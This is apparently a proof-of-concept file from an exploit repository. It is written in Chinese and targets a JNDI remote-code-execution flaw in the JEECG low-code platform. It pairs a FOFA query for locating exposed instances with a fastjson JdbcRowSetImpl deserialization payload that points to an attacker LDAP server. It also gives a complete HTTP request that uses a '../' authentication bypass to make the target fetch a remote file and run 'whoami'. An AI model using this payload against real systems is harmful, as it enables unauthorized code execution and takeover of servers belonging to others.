POC/wpoc/JeecgBoot/Jeecg-jeecgFormDemoController存在JNDI代码执行漏洞.md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

53 lines
1.9 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

## Jeecg-jeecgFormDemoController存在JNDI代码执行漏洞
Jeecg (J2EE C ode G eneration)是一款基于代码生成器的低代码开发平台, 使用 JEECG 可以简单快速地开发出企业级的 Web 应用系统。目前官方已停 止维护。 JEECG 4.0 及之前版本中,由于 /api 接口鉴权时未过滤路径遍历,攻击 者可构造包含 ../ 的 url 绕过鉴权。
因为依赖 1.2.31 版本的 fastjson 该版本存在反序列化漏洞。攻击者可对 /api/../jeecgFormDemoController.do?interfaceTest 接口进行 jndi 注入攻 击实现远程代码执行
## fofa
```
app="JEECG"
```
## poc
创建如下远程文件其内容为fastjson代码执行的payload
```
{
"a":{
"@type":"java.lang.Class",
"val":"com.sun.rowset.JdbcRowSetImpl"
},
"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"ldap://10.66.64.89:1389/8orsiq",
"autoCommit":true
}
}
```
```
POST /api/../jeecgFormDemoController.do?interfaceTest= HTTP/1.1
Host:
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
cmd: whoami
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 77
serverUrl=http://xxxxxxxx:8877/jeecg.txt&requestBody=1&requestMethod=GET
```
![image-20240526195416290](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202405261954336.png)
![image-20240526195357757](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202405261953813.png)